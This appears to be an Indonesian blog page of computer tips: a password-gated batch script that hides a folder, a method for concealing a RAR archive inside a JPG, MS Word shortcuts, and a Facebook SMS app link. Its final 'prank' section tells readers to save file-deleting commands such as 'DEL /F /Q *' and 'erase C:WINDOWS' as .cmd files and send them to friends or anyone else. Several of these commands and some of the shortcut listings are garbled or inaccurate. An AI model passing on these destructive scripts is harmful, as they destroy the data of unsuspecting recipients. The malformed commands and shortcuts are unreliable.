RSS
Write some words about you and your blog here
Memuat...

cara bikin hidden folder

ini ada cara bikin hidden folder, Orginal post by loeffy dari artrikel oleh avada kedavra/dimaz(dari ilmukomputer.com)
1. Create New Folder


. Make a Note [.txt] and type this:
Code:

@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

3. change "PASSWORD HERE" with your password

4. save and change extension with .bat [ex: rahasia.bat]

5. Double Click file rahasia.bat, a new folder will created called "private"


6. save your file in private folder

7. Next, double click file rahasia.bat, until you can see a dialog box
8. type "y" then enter



if you want to see private folder, click file rahasia.bat then type your password..


sori pake bahasa inggris biar semua orang bisa nyoba

oh ya kalo merasa postingan ini bagus thanks please or paling engga replaynya lah

(update)
eh mo nambahin biar semua bisa baca..

kalo mau biar file rahasia bat ini ga bisa diliat orang lain, cukup nambahin enkripsi di paswordnya/or dimanapun, sebanyak mungkin juga boleh...

dengan catatan jangan menambahkan enkripsi diikuti dengan angka

%katakamu%

contoh enkripsi yang benar

misal password-->indowebster

jadinya
i%rahasia%n%rahasia%d%rahasia%o%rahasia%w%rahasia% e%rahasia%b%rahasia%s%rahasia%t%rahasia%e%rahasia% r


contoh yang salah untuk dienkripsi..
%2rahasia%
%4rahasia%

dan sebagainya..

(update)
cara buka file yg dihiden (jadinya keliatan kek kontrol panel adalah dengan mengklik file rahasia.bat kita...

nanti ada printah ngisi password, kalo password dah diisi nanti kebuka foldernya, untuk nutup /ngehidden lagi sama kaya proses no.8

kaya gini


sekian.. kalo ga salah bisa dibuat di kompi or flash disk, soalny di flash disk belom nyoba...

Menyembunyikan File ke dalam Gambar

Apakah anda pernah mempunyai file rahasia yang ingin anda kirimkan kepada orang lain? Ada begitu banyak program proteksi file yang bisa anda dapatkan di Internet. Namun ada begitu banyak cara untuk menembus proteksi program-program tersebut.

Saya akan membagikan sedikit tips bagi anda untuk menyembunyikan file rahasia milik anda ke dalam sebuah file gambar. Sebelumnya pastikan bahwa pada komputer anda telah terinstall WinRar.

1. Settinglah windows anda agar menampilkan ekstensi file. Bukalah Control Panel lalu klik 2X pada Folder Options. Masuklah ke tab View lalu hilangkan tanda centang pada opsi “Hide extensions for known file types”.

2. Persiapkan File rahasia anda (ekstensi file terserah), misalnya memiliki nama video_rahasia.avi dan sebuah file gambar (*.bmp, *.jpg, *.jpeg, *gif) misalnya dengan nama pemandangan.jpg. Simpanlah kedua file tersebut dalam sebuah directory yang sama.

3. Klik kanan pada file video_rahasia.avi lalu pilih menu [Add to “video_rahasia.rar”]. Akan tercipta file baru dengan nama video_rahasia.rar

4. Sekarang bukalah aplikasi NOTEPAD (start -> Run ketik NOTEPAD) lalu ketik script berikut:

@echo off
ren video_rahasia.rar video_rahasia.avi.rar
copy /b pemandangan.jpg+video_rahasia.avi.rar hasil.jpg
del video_rahasia.avi
del pemandangan.jpg
del video_rahasia.avi.rar
del hide.bat

Ingat!! Sesuaikan nama-nama file pada script diatas dengan nama file anda (kecuali hide.bat). Perhatikan juga pada baris berikut:

ren video_rahasia.rar video_rahasia.avi.rar

Format penulisan: Ren namafileanda.rar namafileanda.ekstensisebelumnya.rar

Jadi, jika misalnya file anda sebelumnya adalah rahasia.exe dan setelah di rar menjadi rahasia.rar, maka penulisannya adalah:

ren rahasia.rar rahasia.exe.rar

Perhatikan juga pada nama file hasil.jpg. Ubahlah hasil.jpg menjadi hasil.ekstensi_file_gambar_anda. Jadi, misalnya file gambar yang anda pergunakan untuk menyembunyikan file rahasia nantinya adalah pemandangan.gif, maka ubahlah hasil.jpg menjadi hasil.gif

Well, Simpanlah file ini pada lokasi yang sama dengan file-file anda tadi. Klik [File] [Save] lalu pada form isian File name ketik hide.bat Sedangkan pada Save as type pilih ‘All files’. Klik [Save] sesudahnya.

5. Tutup semua jendela program yang tebuka. Sekarang bukalah folder tempat anda menyimpan semua file-file tadi. Dobel klik pada file hide.bat. Tunggu hingga sekelebat bayangan windows command processor tampil. Jika berhasil, semua file pada folder tersebut akan hilang digantikan dengan sebuah file baru bernama hasil.jpg

Cobalah anda buka file hasil.jpg. Sekilas tidak akan ada bedanya dengan file pemandangan.jpg milik anda kecuali ukuran filenya yang bertambah besar. Anda tetap bisa membuka file tersebut dengan Picture Editor atau Image Viewer kesayangan anda. Tidak ada tanda-tanda bahwa sebenarnya ada rahasia besar didalamnya hehehe..

Lho, lalu dimana file rahasia saya?? Tenang, jangan panik!! Klik kanan pada file hasil.jpg lalu pilihlah [Open With] –> [Choose Program..]. Pilihlah WinRar lalu klik [OK].

Nah, file rahasia anda akan tampil di hadapan anda. Anda bisa meng extract file tersebut sebagaimana anda meng extract file rar pada umumnya.

Disinilah sebenarnya inti dari persembunyian kita. Coba anda pikirkan, dalam kondisi wajar, adakah orang yang membuka file gambar dengan aplikasi file compressor?? Pernahkah terlintas dalam pikiran anda akan membuka gambar-gambar pemandangan dengan menggunakan WinRar?? Tentu tidak bukan?? Tentunya orang pada lazimnya akan membuka file gambar dengan aplikasi olah gambar atau image viewer. Nah, dengan memanfaatkan psikologi ini maka setidaknya file anda akan tersembunyi dengan aman Kini anda bisa mengirimkan file rahasia tersebut kepada orang yang anda maksud dengan tenang. Tentunya jangan lupa untuk memberitahu rekan anda tersebut mengenai cara membukanya



/* ——————————|EOF|—————————— */

sumber : http://www.spyrozone.net/


--------

Originally Posted by dimazbaik View Post

Menyembunyikan File ke dalam Gambar

hai all gue akan membagikan sedikit tips bagi kalian untuk menyembunyikan file rahasia kalianka ke dalam sebuah file gambar.
Sebelumnya pastikan bahwa komputer anda telah terinstall WinRar.

Langkah 1 :
Kumpulkan file-file yang ingin di sembunyikan dan compress jadi satu dengan menggunakan Winrar.
Misalkan beri nama filerahasia.rar

Langkah 2 :
Siapkan sebuah file gambar (.jpg).
Misalkan beri nama gambar.jpg

Langkah 3 :
Letakkan kedua file tersebut ( File gambar.jpg dan filerahasia.rar )dalam sebuah directory yang sama.
misalkan Drive c:

Langkah 4 :
Buka command prompt dan ketikkan :
c:\>copy /b gambar.jpg+filerahasia.rar hasil.jpg

Langkah 5 :
Setelah itu akan tercipta sebuah file baru dengan nama hasil.jpg.
Coba anda buka file hasil.jpg.
Sekilas tidak akan ada bedanya dengan file gambar.jpg milik anda kecuali ukuran filenya yang bertambah besar.
Anda tetap bisa membuka file tersebut dengan Picture Editor atau Image Viewer anda.
Tidak ada tanda-tanda bahwa sebenarnya ada sebuah file rahasia didalamnya.

Langkah 6 :
Bagaimana cara membuka file rahasia anda?
Klik kanan pada file hasil.jpg lalu pilihlah [Open With] –> [Choose Program..]. Pilihlah WinRar lalu klik [OK].
Anda akan bisa melihat file rahasia anda dan bisa mengextract seperti biasanya.

Semoga Bermanfaat.

Shortcut Penting MS Word !!!

Ini sekedar berbagi ilmu tentang Shortcut penting yang ada di MS Word supaya pekerjaan lebih cepat terselesaikan dengan menguasai shortcut ini, walaupun semua juga sudah banyak yang tahu tentang tips ini.
Selamat Mencoba, Semoga Bermanfaat.

1. Ctrl+Shift+A Ubah kata jadi huruf kapital
2. Ctrl+Shift+P Mengubah ukuran font
3. Ctrl+} Memperbesar ukuran font
4. Ctrl+{ Menurunkan ukuran font
5. Ctrl+Shift+G Menampilkan Word Count
6. Ctrl+Shift+B Menebalkan Huruf
7. Ctrl+Shift+U Menggarisbawahi Kata
8. Ctrl+Shift+D Double Underline
9. Ctrl+Shift+I Italic
10. Ctrl+Shift+Q Ubah huruf menjadi simbol
11. Ctrl+Shift++ Menaikkan huruf (superscript)
12. Ctrl++ Menurunkan huruf (subscript)
13. Ctrl+Shift+N Ubah paragraf menjadi template normal
14. Ctrl+S Menyimpan file
15. Ctrl+1 Jarak baris normal
16. Ctrl+2 Dua kali jarak baris
17. Ctrl+5 1,5 kali jarak baris
18. Ctrl+0 Menyisipkan baris sebelum paragraf
19. Ctrl+E Teks di tengah (center)
20. Ctrl+J Teks rata kiri & kanan (justify)
21. Ctrl+L Penulisan teks rata kiri
22. Ctrl+R Penulisan teks rata kanan


Jika Informasi ini berguna bagi anda, silahkan klik Thanks Ok.

Sms gratis sambil Facebookan

langsung ajah...

buat yg sering onlen facebook tp gapunya pulsa bwt sms, ni solusinya bro...
sambil buka facebook kita bisa sms gratis pake aplikasi neh...

coba deh...

http://apps.facebook.com/balicode/

cukup login aja...

Ngerjain Orang Lain pake Notepad

Seperti Tread gw sebelumnya, gw menulis tentang Notepad..
dan Ingat !
Jangan Disalah Gunakan... Ini cuman Buat iseng

Notepad adalah senjata Ampuh

gunakan notepad sebagai senjata kalian untuk ngerjain orang lain.

Menghapus Files dan Folder

1. buka notepad trus ketik DEL /F /Q *
2. save as dan simpan dengan nama test.cmd
3. kalau elo dobel klik file test.cmd maka semua files dan folder akan terhapus.

Menghapus Files Tertentu

1. buka notepad trus ketik erase C:TEST.txt
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka files TEST.txt di drive c:\ akan terhapus

Menghapus Folder Tertentu

1. buka notepad trus ketik erase C:WINDOWS
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka folder WINDOWS di drive c:\ akan terhapus

nah kalo sudah jadi, tinggal kalian kirim aja ke temen kalian, ato siapapun. simpel tapi "merugikan"

Sekali Lagi
Ingat !
Jangan di SalahGunakan